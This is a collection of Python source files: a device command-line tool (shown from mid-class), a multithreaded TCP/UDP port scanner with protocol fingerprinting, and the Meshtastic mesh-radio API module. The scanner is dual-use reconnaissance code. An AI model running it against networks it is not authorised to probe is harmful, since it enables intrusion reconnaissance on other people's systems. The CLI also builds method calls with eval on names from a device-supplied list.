def handle_receive_continous_data(self, packet_type, data):
if self._tunnel:
self._tunnel.notify('continous', packet_type, data)
def _prepare_driver(self):
self._driver = Driver(self.options)
self._driver.on(DriverEvents.Discovered,
self.handle_discovered)
self._driver.on(DriverEvents.Lost,
self.handle_lost)
self._driver.on(DriverEvents.UpgradeFinished,
self.handle_upgrade_finished)
self._driver.on(DriverEvents.UpgradeFail,
self.handle_upgrade_fail)
self._driver.on(DriverEvents.Error,
self.handle_error)
self._driver.on(DriverEvents.Continous,
self.handle_receive_continous_data)
self._driver.detect()
self.setup_command_handler()
def _prepare_logger(self):
'''
Set default log handler: console logger, file logger
'''
executor_path = resource.get_executor_path()
log_level = 'info'
if self.options.debug:
log_level = 'debug'
console_log = self.options.console_log
APP_CONTEXT.set_logger(
AppLogger(
filename=os.path.join(executor_path, 'loggers', 'trace.log'),
gen_file=True,
level=log_level,
console_log=console_log
))
APP_CONTEXT.set_print_logger(
AppLogger(
filename=os.path.join(
executor_path, 'loggers', 'print_' + time.strftime('%Y%m%d_%H%M%S') + '.log'),
gen_file=True,
level=log_level
))
def setup_command_handler(self):
'''
Prepare command
'''
self.supported_commands = self._driver.execute('get_command_lines')
cmd_flag = True
while True:
if cmd_flag:
token = input(">>")
else:
token = input("")
self.input_string = token.split(" ")
if token.strip() == 'exit':
break
if self.webserver_running and token.strip() != 'stop':
print("server is on-going, please stop it")
continue
for command in self.supported_commands:
if command['name'] == self.input_string[0]:
self.current_command = command
eval('self.%s()' % (command['function']))
cmd_flag = False
break
else:
self.help_handler()
self.exit_handler()
return True
def start_webserver(self):
'''
Start websocket server
'''
import tornado.ioloop
if sys.version_info[0] > 2:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
event_loop = tornado.ioloop.IOLoop.current()
self._tunnel = WebServer(self.options, event_loop)
self._tunnel.on(TunnelEvents.Request, self.handle_request)
self._tunnel.setup()
def _build_options(self, **kwargs):
self.options = WebserverArgs(**kwargs)
# command handler
def help_handler(self):
'''
Help handler
'''
if len(self.supported_commands) > 0:
print("Usage: ")
for command in self.supported_commands:
print(command['name'] + " : " + command['description'])
else:
print("No more command line.")
def connect_handler(self):
'''
Connect to device, may no need it later
'''
print(self._driver.execute('get_device_info'))
def upgrade_handler(self):
'''upgrade command is used for firmware upgrade and followed by file name
'''
input_args = len(self.input_string)
if input_args == 1:
print("Usage:")
print("upgrade file_name")
else:
file_name = self.input_string[1]
# TODO: check device is idel
self._driver.execute('upgrade_framework', file_name)
return True
def record_handler(self):
'''record command is used to save the outputs into local machine
'''
# TODO: check device is idel
if APP_CONTEXT.device_context.runtime_status != 'LOGGING':
self._driver.execute('start_data_log')
return True
def stop_handler(self):
'''record command is used to save the outputs into local machine
'''
# TODO: check device is idel
if APP_CONTEXT.device_context.runtime_status == 'LOGGING':
self._driver.execute('stop_data_log')
if self.webserver_running:
self._tunnel.stop_ws_server()
self.webserver_running = False
return True
def get_handler(self):
'''
Get parameter of device
'''
input_args = len(self.input_string)
conf = self._driver.execute('get_conf')
input_params_properties = conf['data']['inputParams']
select_param = None
if (input_args == 1):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if (i == len(input_params_properties)):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
param = self._driver.execute(
'get_param', {'paramId': select_param['paramId']})
print(param['data']['value'])
return True
def set_handler(self):
'''
Set parameter of device
'''
input_args = len(self.input_string)
conf = self._driver.execute('get_conf')
input_params_properties = conf['data']['inputParams']
select_param = None
not_in_options = False
options = []
if input_args == 1:
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if input_args == 2:
if i == len(input_params_properties):
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
else:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
if select_param.__contains__('options'):
for item in select_param['options']:
if isinstance(item, dict):
options.append(int(item['key']))
else:
options.append(item)
if select_param['type'] == 'int64':
self.input_string[2] = int(self.input_string[2])
if select_param['type'] == "char8" and self.input_string[2] not in select_param['options']:
not_in_options = True
if select_param['type'] == "int64" and\
self.input_string[2] not in options:
not_in_options = True
if not_in_options:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
conf = self._driver.execute('set_param', {
'paramId': select_param['paramId'],
'value': self.input_string[2]
})
# TODO: display a response message to user
return True
def save_handler(self):
'''
Save device configuration
'''
self._driver.execute('save_config')
return True
def server_start_handler(self):
'''
start a websocket server
'''
return True
def exit_handler(self):
'''
Exit current process
'''
# self.webserver.stop()
# self.webserver_running = False
pid = getpid()
process = psutil.Process(pid)
process.kill()
def run_handler(self):
'''used by customers
'''
return True
|
portscan.py
|
import socket
import threading
import queue
import random
random_time = random.randint(2 ** 16, 2 ** 64 - 1).to_bytes(8, 'big')
udp_to_send = b'\x13' + b'\0' * 39 + random_time
def define_proto(data):
if len(data) > 4 and data[:4] == b'HTTP':
return ' HTTP'
if b'SMTP' in data:
return ' SMTP'
if b'POP3' in data:
return ' POP3'
if b'IMAP' in data:
return ' IMAP'
if len(data) > 11 and data[:2] == udp_to_send[:2] and (data[3] & 1) == 1:
return ' DNS'
if len(data) > 39:
mode = 7 & data[0]
version = (data[0] >> 3) & 7
if mode == 4 and version == 2 and random_time == data[24:32]:
return ' NTP'
return ''
def make_queue(start_port, end_port, tcp, udp):
"""Максимальное число записей равно 130`000, поэтому решил не заморачиваться"""
q = queue.Queue()
for i in range(start_port, end_port + 1):
if tcp:
q.put(('t', i))
if udp:
q.put(('u', i))
return q
class Scanner:
def __init__(self, host: str, start_port: int = 1, end_port: int = 65535, tcp: bool = True,
udp: bool = True, timeout: int = 0.5, workers: int = 20):
self.host = host
self.ports = make_queue(start_port, end_port, tcp, udp)
socket.setdefaulttimeout(timeout)
self.to_print = queue.Queue()
self.isWorking = True
self.threads = [threading.Thread(target=self._do_work) for _ in range(workers)]
def start(self):
for t in self.threads:
t.setDaemon(True)
t.start()
while not self.ports.empty() and self.isWorking:
try:
print(self.to_print.get(block=False))
except queue.Empty:
pass
for t in self.threads:
t.join()
while not self.to_print.empty():
print(self.to_print.get())
def stop(self):
self.isWorking = False
for t in self.threads:
t.join()
def _do_work(self):
while self.isWorking:
try:
_type, port = self.ports.get(block=False)
except queue.Empty:
break
else:
if _type == 't':
self._check_tcp(port)
if _type == 'u':
self._check_udp(port)
def _check_tcp(self, port):
sock = socket.socket()
try:
sock.connect((self.host, port))
except socket.error:
pass
except ConnectionResetError:
pass
else:
sock.send(b'a'*250 + b'\r\n\r\n')
try:
data = sock.recv(1024)
self.to_print.put(f'TCP {port}{define_proto(data)}')
except socket.timeout:
self.to_print.put(f'TCP {port}')
finally:
sock.close()
def _check_udp(self, port):
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
sender.sendto(udp_to_send, (self.host, port))
data, host = sender.recvfrom(1024)
except ConnectionResetError:
pass
except socket.timeout:
self.to_print.put(f'UDP {port}')
else:
self.to_print.put(f'UDP {port}{define_proto(data)}')
finally:
sender.close()
|
__init__.py
|
"""
# an API for Meshtastic devices
Primary class: SerialInterface
Install with pip: "[pip3 install meshtastic](https://pypi.org/project/meshtastic/)"
Source code on [github](https://github.com/meshtastic/Meshtastic-python)
properties of SerialInterface:
- radioConfig - Current radio configuration and device settings, if you write to this the new settings will be applied to
the device.
- nodes - The database of received nodes. Includes always up-to-date location and username information for each
node in the mesh. This is a read-only datastructure.
- nodesByNum - like "nodes" but keyed by nodeNum instead of nodeId
- myInfo - Contains read-only information about the local radio device (software version, hardware version, etc)
# Published PubSub topics
We use a [publish-subscribe](https://pypubsub.readthedocs.io/en/v4.0.3/) model to communicate asynchronous events. Available
topics:
- meshtastic.connection.established - published once we've successfully connected to the radio and downloaded the node DB
- meshtastic.connection.lost - published once we've lost our link to the radio
- meshtastic.receive.text(packet) - delivers a received packet as a dictionary, if you only care about a particular
type of packet, you should subscribe to the full topic name. If you want to see all packets, simply subscribe to "meshtastic.receive".
- meshtastic.receive.position(packet)
- meshtastic.receive.user(packet)
- meshtastic.receive.data.portnum(packet) (where portnum is an integer or well known PortNum enum)
- meshtastic.node.updated(node = NodeInfo) - published when a node in the DB changes (appears, location changed, username changed, etc...)
We receive position, user, or data packets from the mesh. You probably only care about meshtastic.receive.data. The first argument for
that publish will be the packet. Text or binary data packets (from sendData or sendText) will both arrive this way. If you print packet
you'll see the fields in the dictionary. decoded.data.payload will contain the raw bytes that were sent. If the packet was sent with
sendText, decoded.data.text will **also** be populated with the decoded string. For ASCII these two strings will be the same, but for
unicode scripts they can be different.
# Example Usage
```
import meshtastic
from pubsub import pub
def onReceive(packet, interface): # called when a packet arrives
print(f"Received: {packet}")
def onConnection(interface, topic=pub.AUTO_TOPIC): # called when we (re)connect to the radio
# defaults to broadcast, specify a destination ID if you wish
interface.sendText("hello mesh")
pub.subscribe(onReceive, "meshtastic.receive")
pub.subscribe(onConnection, "meshtastic.connection.established")
# By default will try to find a meshtastic device, otherwise provide a device path like /dev/ttyUSB0
interface = meshtastic.SerialInterface()
```
"""
import base64
import logging
import os
import platform
import random
import socket
import sys
import stat
import threading
import traceback
import time
from datetime import datetime
from typing import *
import serial
import timeago
import google.protobuf.json_format
import pygatt
from pubsub import pub
from dotmap import DotMap
from tabulate import tabulate
from google.protobuf.json_format import MessageToJson
from .util import fixme, catchAndIgnore, stripnl, DeferredExecution, Timeout
from .node import Node
from . import mesh_pb2, portnums_pb2, apponly_pb2, admin_pb2, environmental_measurement_pb2, remote_hardware_pb2, channel_pb2, radioconfig_pb2, util
START1 = 0x94
START2 = 0xc3
HEADER_LEN = 4
MAX_TO_FROM_RADIO_SIZE = 512
defaultHopLimit = 3
"""A special ID that means broadcast"""
BROADCAST_ADDR = "^all"
"""A special ID that means the local node"""
LOCAL_ADDR = "^local"
# if using 8 bit nodenums this will be shortend on the target
BROADCAST_NUM = 0xffffffff
"""The numeric buildnumber (shared with android apps) specifying the level of device code we are guaranteed to understand
format is Mmmss (where M is 1+the numeric major number. i.e. 20120 means 1.1.20
"""
OUR_APP_VERSION = 20200
publishingThread = DeferredExecution("publishing")
class ResponseHandler(NamedTuple):
"""A pending response callback, waiting for a response to one of our messages"""
# requestId: int - used only as a key
callback: Callable
# FIXME, add timestamp and age out old requests
class KnownProtocol(NamedTuple):
"""Used to automatically decode known protocol payloads"""
name: str
# portnum: int, now a key
# If set, will be called to prase as a protocol buffer
protobufFactory: Callable = None
# If set, invoked as onReceive(interface, packet)
onReceive: Callable = None
class MeshInterface:
"""Interface class for meshtastic devices
Properties:
isConnected
nodes
debugOut
"""
def __init__(self, debugOut=None, noProto=False):
"""Constructor
Keyword Arguments:
noProto -- If True, don't try to run our protocol on the link - just be a dumb serial client.
"""
self.debugOut = debugOut
self.nodes = None # FIXME
self.isConnected = threading.Event()
self.noProto = noProto
self.localNode = Node(self, -1) # We fixup nodenum later
self.myInfo = None # We don't have device info yet
self.responseHandlers = {} # A map from request ID to the handler
self.failure = None # If we've encountered a fatal exception it will be kept here
self._timeout = Timeout()
self.heartbeatTimer = None
random.seed() # FIXME, we should not clobber the random seedval here, instead tell user they must call it
self.currentPacketId = random.randint(0, 0xffffffff)
def close(self):
"""Shutdown this interface"""
if self.heartbeatTimer:
self.heartbeatTimer.cancel()
self._sendDisconnect()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is not None and exc_value is not None:
logging.error(
f'An exception of type {exc_type} with value {exc_value} has occurred')
if traceback is not None:
logging.error(f'Traceback: {traceback}')
self.close()
def showInfo(self, file=sys.stdout):
"""Show human readable summary about this object"""
owner = f"Owner: {self.getLongName()} ({self.getShortName()})"
myinfo = f"\nMy info: {stripnl(MessageToJson(self.myInfo))}"
mesh = "\nNodes in mesh:"
nodes = ""
for n in self.nodes.values():
nodes = nodes + f" {stripnl(n)}"
infos = owner + myinfo + mesh + nodes
print(infos)
return infos
def showNodes(self, includeSelf=True, file=sys.stdout):
"""Show table summary of nodes in mesh"""
def formatFloat(value, precision=2, unit=''):
return f'{value:.{precision}f}{unit}' if value else None
def getLH(ts):
return datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') if ts else None
def getTimeAgo(ts):
return timeago.format(datetime.fromtimestamp(ts), datetime.now()) if ts else None
rows = []
for node in self.nodes.values():
if not includeSelf and node['num'] == self.localNode.nodeNum:
continue
row = {"N": 0}
user = node.get('user')
if user:
row.update({
"User": user['longName'],
"AKA": user['shortName'],
"ID": user['id'],
})
pos = node.get('position')
if pos:
row.update({
"Latitude": formatFloat(pos.get("latitude"), 4, "°"),
"Longitude": formatFloat(pos.get("longitude"), 4, "°"),
"Altitude": formatFloat(pos.get("altitude"), 0, " m"),
"Battery": formatFloat(pos.get("batteryLevel"), 2, "%"),
})
row.update({
"SNR": formatFloat(node.get("snr"), 2, " dB"),
"LastHeard": getLH(node.get("lastHeard")),
"Since": getTimeAgo(node.get("lastHeard")),
})
rows.append(row)
# Why doesn't this way work?
#rows.sort(key=lambda r: r.get('LastHeard', '0000'), reverse=True)
rows.sort(key=lambda r: r.get('LastHeard') or '0000', reverse=True)
for i, row in enumerate(rows):
row['N'] = i+1
table = tabulate(rows, headers='keys', missingval='N/A',
tablefmt='fancy_grid')
print(table)
return table
def getNode(self, nodeId):
"""Return a node object which contains device settings and channel info"""
if nodeId == LOCAL_ADDR:
return self.localNode
else:
n = Node(self, nodeId)
n.requestConfig()
if not n.waitForConfig():
raise Exception("Timed out waiting for node config")
return n
def sendText(self, text: AnyStr,
destinationId=BROADCAST_ADDR,
wantAck=False,
wantResponse=False,
hopLimit=defaultHopLimit,
onResponse=None,
channelIndex=0):
"""Send a utf8 string to some other node, if the node has a display it will also be shown on the device.
Arguments:
text {string} -- The text to send
Keyword Arguments:
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
portNum -- the application portnum (similar to IP port numbers) of the destination, see portnums.proto for a list
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
wantResponse -- True if you want the service on the other side to send an application layer response
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
return self.sendData(text.encode("utf-8"), destinationId,
portNum=portnums_pb2.PortNum.TEXT_MESSAGE_APP,
wantAck=wantAck,
wantResponse=wantResponse,
hopLimit=hopLimit,
onResponse=onResponse,
channelIndex=channelIndex)
def sendData(self, data, destinationId=BROADCAST_ADDR,
portNum=portnums_pb2.PortNum.PRIVATE_APP, wantAck=False,
wantResponse=False,
hopLimit=defaultHopLimit,
onResponse=None,
channelIndex=0):
"""Send a data packet to some other node
Keyword Arguments:
data -- the data to send, either as an array of bytes or as a protobuf (which will be automatically serialized to bytes)
destinationId {nodeId or nodeNum} -- where to send this message (default: {BROADCAST_ADDR})
portNum -- the application portnum (similar to IP port numbers) of the destination, see portnums.proto for a list
wantAck -- True if you want the message sent in a reliable manner (with retries and ack/nak provided for delivery)
wantResponse -- True if you want the service on the other side to send an application layer response
onResponse -- A closure of the form funct(packet), that will be called when a response packet arrives
(or the transaction is NAKed due to non receipt)
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
if getattr(data, "SerializeToString", None):
logging.debug(f"Serializing protobuf as data: {stripnl(data)}")
data = data.SerializeToString()
if len(data) > mesh_pb2.Constants.DATA_PAYLOAD_LEN:
raise Exception("Data payload too big")
if portNum == portnums_pb2.PortNum.UNKNOWN_APP: # we are now more strict wrt port numbers
raise Exception("A non-zero port number must be specified")
meshPacket = mesh_pb2.MeshPacket()
meshPacket.channel = channelIndex
meshPacket.decoded.payload = data
meshPacket.decoded.portnum = portNum
meshPacket.decoded.want_response = wantResponse
p = self._sendPacket(meshPacket, destinationId,
wantAck=wantAck, hopLimit=hopLimit)
if onResponse is not None:
self._addResponseHandler(p.id, onResponse)
return p
def sendPosition(self, latitude=0.0, longitude=0.0, altitude=0, timeSec=0, destinationId=BROADCAST_ADDR, wantAck=False, wantResponse=False):
"""
Send a position packet to some other node (normally a broadcast)
Also, the device software will notice this packet and use it to automatically set its notion of
the local position.
If timeSec is not specified (recommended), we will use the local machine time.
Returns the sent packet. The id field will be populated in this packet and can be used to track future message acks/naks.
"""
p = mesh_pb2.Position()
if latitude != 0.0:
p.latitude_i = int(latitude / 1e-7)
if longitude != 0.0:
p.longitude_i = int(longitude / 1e-7)
if altitude != 0:
p.altitude = int(altitude)
if timeSec == 0:
timeSec = time.time() # returns unix timestamp in seconds
p.time = int(timeSec)
return self.sendData(p, destinationId,
portNum=portnums_pb2.PortNum.POSITION_APP,
wantAck=wantAck,
wantResponse=wantResponse)
def _addResponseHandler(self, requestId, callback):
self.responseHandlers[requestId] = ResponseHandler(callback)
def _sendPacket(self, meshPacket,
destinationId=BROADCAST_ADDR,
wantAck=False, hopLimit=defaultHopLimit):
"""Send a MeshPacket to the specified node (or if unspecified, broadcast).
You probably don't want this - use sendData instead.
Returns the sent packet. The id field will be populated in this packet and
can be used to track future message acks/naks.
"""
# We allow users to talk to the local node before we've completed the full connection flow...
if(self.myInfo is not None and destinationId != self.myInfo.my_node_num):
self._waitConnected()
toRadio = mesh_pb2.ToRadio()
if destinationId is None:
raise Exception("destinationId must not be None")
elif isinstance(destinationId, int):
nodeNum = destinationId
elif destinationId == BROADCAST_ADDR:
nodeNum = BROADCAST_NUM
elif destinationId == LOCAL_ADDR:
nodeNum = self.myInfo.my_node_num
# A simple hex style nodeid - we can parse this without needing the DB
elif destinationId.startswith("!"):
nodeNum = int(destinationId[1:], 16)
else:
node = self.nodes.get(destinationId)
if not node:
raise Exception(f"NodeId {destinationId} not found in DB")
nodeNum = node['num']
meshPacket.to = nodeNum
meshPacket.want_ack = wantAck
meshPacket.hop_limit = hopLimit
# if the user hasn't set an ID for this packet (likely and recommended), we should pick a new unique ID
# so the message can be tracked.
if meshPacket.id == 0:
meshPacket.id = self._generatePacketId()
toRadio.packet.CopyFrom(meshPacket)
#logging.debug(f"Sending packet: {stripnl(meshPacket)}")
self._sendToRadio(toRadio)
return meshPacket
def waitForConfig(self):
"""Block until radio config is received. Returns True if config has been received."""
success = self._timeout.waitForSet(self, attrs=('myInfo', 'nodes')
) and self.localNode.waitForConfig()
if not success:
raise Exception("Timed out waiting for interface config")
def getMyNodeInfo(self):
"""Get info about my node."""
if self.myInfo is None:
return None
return self.nodesByNum.get(self.myInfo.my_node_num)
def getMyUser(self):
"""Get user"""
nodeInfo = self.getMyNodeInfo()
if nodeInfo is not None:
return nodeInfo.get('user')
return None
def getLongName(self):
"""Get long name"""
user = self.getMyUser()
if user is not None:
return user.get('longName', None)
return None
def getShortName(self):
"""Get short name"""
user = self.getMyUser()
if user is not None:
return user.get('shortName', None)
return None
def _waitConnected(self):
"""Block until the initial node db download is complete, or timeout
and raise an exception"""
if not self.isConnected.wait(10.0): # timeout after 10 seconds
raise Exception("Timed out waiting for connection completion")
# If we failed while connecting, raise the connection to the client
if self.failure:
raise self.failure
def _generatePacketId(self):
"""Get a new unique packet ID"""
if self.currentPacketId is None:
raise Exception("Not connected yet, can not generate packet")
else:
self.currentPacketId = (self.currentPacketId + 1) & 0xffffffff
return self.currentPacketId
def _disconnected(self):
"""Called by subclasses to tell clients this interface has disconnected"""
self.isConnected.clear()
publishingThread.queueWork(lambda: pub.sendMessage(
"meshtastic.connection.lost", interface=self))
def _startHeartbeat(self):
"""We need to send a heartbeat message to the device every X seconds"""
def callback():
self.heartbeatTimer = None
prefs = self.localNode.radioConfig.preferences
i = prefs.phone_timeout_secs / 2
logging.debug(f"Sending heartbeat, interval {i}")
if i != 0:
self.heartbeatTimer = threading.Timer(i, callback)
self.heartbeatTimer.start()
p = mesh_pb2.ToRadio()
self._sendToRadio(p)
callback() # run our periodic callback now, it will make another timer if necessary
def _connected(self):
"""Called by this class to tell clients we are now fully connected to a node
"""
# (because I'm lazy) _connected might be called when remote Node
# objects complete their config reads, don't generate redundant isConnected
# for the local interface
if not self.isConnected.is_set():
self.isConnected.set()
self._startHeartbeat()
publishingThread.queueWork(lambda: pub.sendMessage(
"meshtastic.connection.established", interface=self))
def _startConfig(self):
"""Start device packets flowing"""
self.myInfo = None
self.nodes = {} # nodes keyed by ID
self.nodesByNum = {} # nodes keyed by nodenum
startConfig = mesh_pb2.ToRadio()
self.configId = random.randint(0, 0xffffffff)
startConfig.want_config_id = self.configId
self._sendToRadio(startConfig)
def _sendDisconnect(self):
"""Tell device we are done using it"""
m = mesh_pb2.ToRadio()
m.disconnect = True
self._sendToRadio(m)
def _sendToRadio(self, toRadio):
"""Send a ToRadio protobuf to the device"""
if self.noProto:
logging.warn(
f"Not sending packet because protocol use is disabled by noProto")
else:
#logging.debug(f"Sending toRadio: {stripnl(toRadio)}")
self._sendToRadioImpl(toRadio)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
logging.error(f"Subclass must provide toradio: {toRadio}")
def _handleConfigComplete(self):
"""
Done with initial config messages, now send regular MeshPackets to ask for settings and channels
"""
self.localNode.requestConfig()
def _handleFromRadio(self, fromRadioBytes):
"""
Handle a packet that arrived from the radio(update model and publish events)
Called by subclasses."""
fromRadio = mesh_pb2.FromRadio()
fromRadio.ParseFromString(fromRadioBytes)
asDict = google.protobuf.json_format.MessageToDict(fromRadio)
#logging.debug(f"Received from radio: {fromRadio}")
if fromRadio.HasField("my_info"):
self.myInfo = fromRadio.my_info
self.localNode.nodeNum = self.myInfo.my_node_num
logging.debug(f"Received myinfo: {stripnl(fromRadio.my_info)}")
failmsg = None
# Check for app too old
if self.myInfo.min_app_version > OUR_APP_VERSION:
failmsg = "This device needs a newer python client, please \"pip install --upgrade meshtastic\". For more information see https://tinyurl.com/5bjsxu32"
# check for firmware too old
if self.myInfo.max_channels == 0:
failmsg = "This version of meshtastic-python requires device firmware version 1.2 or later. For more information see https://tinyurl.com/5bjsxu32"
if failmsg:
self.failure = Exception(failmsg)
self.isConnected.set() # let waitConnected return this exception
self.close()
elif fromRadio.HasField("node_info"):
node = asDict["nodeInfo"]
try:
self._fixupPosition(node["position"])
except:
logging.debug("Node without position")
logging.debug(f"Received nodeinfo: {node}")
self.nodesByNum[node["num"]] = node
if "user" in node: # Some nodes might not have user/ids assigned yet
self.nodes[node["user"]["id"]] = node
publishingThread.queueWork(lambda: pub.sendMessage("meshtastic.node.updated",
node=node, interface=self))
elif fromRadio.config_complete_id == self.configId:
# we ignore the config_complete_id, it is unneeded for our stream API fromRadio.config_complete_id
logging.debug(f"Config complete ID {self.configId}")
self._handleConfigComplete()
elif fromRadio.HasField("packet"):
self._handlePacketFromRadio(fromRadio.packet)
elif fromRadio.rebooted:
# Tell clients the device went away. Careful not to call the overridden subclass version that closes the serial port
MeshInterface._disconnected(self)
self._startConfig() # redownload the node db etc...
else:
logging.debug("Unexpected FromRadio payload")
def _fixupPosition(self, position):
"""Convert integer lat/lon into floats
Arguments:
position {Position dictionary} -- object ot fix up
"""
if "latitudeI" in position:
position["latitude"] = position["latitudeI"] * 1e-7
if "longitudeI" in position:
position["longitude"] = position["longitudeI"] * 1e-7
def _nodeNumToId(self, num):
"""Map a node node number to a node ID
Arguments:
num {int} -- Node number
Returns:
string -- Node ID
"""
if num == BROADCAST_NUM:
return BROADCAST_ADDR
try:
return self.nodesByNum[num]["user"]["id"]
except:
logging.debug(f"Node {num} not found for fromId")
return None
def _getOrCreateByNum(self, nodeNum):
"""Given a nodenum find the NodeInfo in the DB (or create if necessary)"""
if nodeNum == BROADCAST_NUM:
raise Exception("Can not create/find nodenum by the broadcast num")
if nodeNum in self.nodesByNum:
return self.nodesByNum[nodeNum]
else:
n = {"num": nodeNum} # Create a minimial node db entry
self.nodesByNum[nodeNum] = n
return n
def _handlePacketFromRadio(self, meshPacket):
"""Handle a MeshPacket that just arrived from the radio
Will publish one of the following events:
- meshtastic.receive.text(packet = MeshPacket dictionary)
- meshtastic.receive.position(packet = MeshPacket dictionary)
- meshtastic.receive.user(packet = MeshPacket dictionary)
- meshtastic.receive.data(packet = MeshPacket dictionary)
"""
asDict = google.protobuf.json_format.MessageToDict(meshPacket)
# We normally decompose the payload into a dictionary so that the client
# doesn't need to understand protobufs. But advanced clients might
# want the raw protobuf, so we provide it in "raw"
asDict["raw"] = meshPacket
# from might be missing if the nodenum was zero.
if not "from" in asDict:
asDict["from"] = 0
logging.error(
f"Device returned a packet we sent, ignoring: {stripnl(asDict)}")
return
if not "to" in asDict:
asDict["to"] = 0
# /add fromId and toId fields based on the node ID
try:
asDict["fromId"] = self._nodeNumToId(asDict["from"])
except Exception as ex:
logging.warn(f"Not populating fromId {ex}")
try:
asDict["toId"] = self._nodeNumToId(asDict["to"])
except Exception as ex:
logging.warn(f"Not populating toId {ex}")
# We could provide our objects as DotMaps - which work with . notation or as dictionaries
# asObj = DotMap(asDict)
topic = "meshtastic.receive" # Generic unknown packet type
decoded = asDict["decoded"]
# The default MessageToDict converts byte arrays into base64 strings.
# We don't want that - it messes up data payload. So slam in the correct
# byte array.
decoded["payload"] = meshPacket.decoded.payload
# UNKNOWN_APP is the default protobuf portnum value, and therefore if not set it will not be populated at all
# to make API usage easier, set it to prevent confusion
if not "portnum" in decoded:
decoded["portnum"] = portnums_pb2.PortNum.Name(
portnums_pb2.PortNum.UNKNOWN_APP)
portnum = decoded["portnum"]
topic = f"meshtastic.receive.data.{portnum}"
# decode position protobufs and update nodedb, provide decoded version as "position" in the published msg
# move the following into a 'decoders' API that clients could register?
portNumInt = meshPacket.decoded.portnum # we want portnum as an int
handler = protocols.get(portNumInt)
# The decoded protobuf as a dictionary (if we understand this message)
p = None
if handler is not None:
topic = f"meshtastic.receive.{handler.name}"
# Convert to protobuf if possible
if handler.protobufFactory is not None:
pb = handler.protobufFactory()
pb.ParseFromString(meshPacket.decoded.payload)
p = google.protobuf.json_format.MessageToDict(pb)
asDict["decoded"][handler.name] = p
# Also provide the protobuf raw
asDict["decoded"][handler.name]["raw"] = pb
# Call specialized onReceive if necessary
if handler.onReceive is not None:
handler.onReceive(self, asDict)
# Is this message in response to a request, if so, look for a handler
requestId = decoded.get("requestId")
if requestId is not None:
# We ignore ACK packets, but send NAKs and data responses to the handlers
routing = decoded.get("routing")
isAck = routing is not None and ("errorReason" not in routing)
if not isAck:
# we keep the responseHandler in dict until we get a non ack
handler = self.responseHandlers.pop(requestId, None)
if handler is not None:
handler.callback(asDict)
logging.debug(f"Publishing {topic}: packet={stripnl(asDict)} ")
publishingThread.queueWork(lambda: pub.sendMessage(
topic, packet=asDict, interface=self))
# Our standard BLE characteristics
TORADIO_UUID = "f75c76d2-129e-4dad-a1dd-7866124401e7"
FROMRADIO_UUID = "8ba2bcc2-ee02-4a55-a531-c525c5e454d5"
FROMNUM_UUID = "ed9da18c-a800-4f66-a670-aa7547e34453"
class BLEInterface(MeshInterface):
"""A not quite ready - FIXME - BLE interface to devices"""
def __init__(self, address, debugOut=None):
self.address = address
self.adapter = pygatt.GATTToolBackend() # BGAPIBackend()
self.adapter.start()
logging.debug(f"Connecting to {self.address}")
self.device = self.adapter.connect(address)
logging.debug("Connected to device")
# fromradio = self.device.char_read(FROMRADIO_UUID)
MeshInterface.__init__(self, debugOut=debugOut)
self._readFromRadio() # read the initial responses
def handle_data(handle, data):
self._handleFromRadio(data)
self.device.subscribe(FROMNUM_UUID, callback=handle_data)
def _sendToRadioImpl(self, toRadio):
"""Send a ToRadio protobuf to the device"""
#logging.debug(f"Sending: {stripnl(toRadio)}")
b = toRadio.SerializeToString()
self.device.char_write(TORADIO_UUID, b)
def close(self):
MeshInterface.close(self)
self.adapter.stop()
def _readFromRadio(self):
wasEmpty = False
while not wasEmpty:
b = self.device.char_read(FROMRADIO_UUID)
wasEmpty = len(b) == 0
if not wasEmpty:
self._handleFromRadio(b)
class StreamInterface(MeshInterface):
"""Interface class for meshtastic devices over a stream link (serial, TCP, etc)"""
def __init__(self, debugOut=None, noProto=False, connectNow=True):
"""Constructor, opens a connection to self.stream
Keyword Arguments:
devPath {string} -- A filepath to a device, i.e. /dev/ttyUSB0 (default: {None})
debugOut {stream} -- If a stream is provided, any debug serial output from the device will be emitted to that stream. (default: {None})
Raises:
Exception: [description]
Exception: [description]
"""
if not hasattr(self, 'stream'):
raise Exception(
"StreamInterface is now abstract (to update existing code create SerialInterface instead)")
self._rxBuf = bytes() # empty
self._wantExit = False
# FIXME, figure out why daemon=True causes reader thread to exit too early
self._rxThread = threading.Thread(
target=self.__reader, args=(), daemon=True)
MeshInterface.__init__(self, debugOut=debugOut, noProto=noProto)
# Start the reader thread after superclass constructor completes init
if connectNow:
self.connect()
if not noProto:
self.waitForConfig()
def connect(self):
"""Connect to our radio
Normally this is called automatically by the constructor, but if you passed in connectNow=False you can manually
start the reading thread later.
"""
# Send some bogus UART characters to force a sleeping device to wake, and if the reading statemachine was parsing a bad packet make sure
# we write enought start bytes to force it to resync (we don't use START1 because we want to ensure it is looking for START1)
p = bytearray([START2] * 32)
self._writeBytes(p)
time.sleep(0.1) # wait 100ms to give device time to start running
self._rxThread.start()
self._startConfig()
if not self.noProto: # Wait for the db download if using the protocol
self._waitConnected()
def _disconnected(self):
"""We override the superclass implementation to close our port"""
MeshInterface._disconnected(self)
logging.debug("Closing our port")
if not self.stream is None:
self.stream.close()
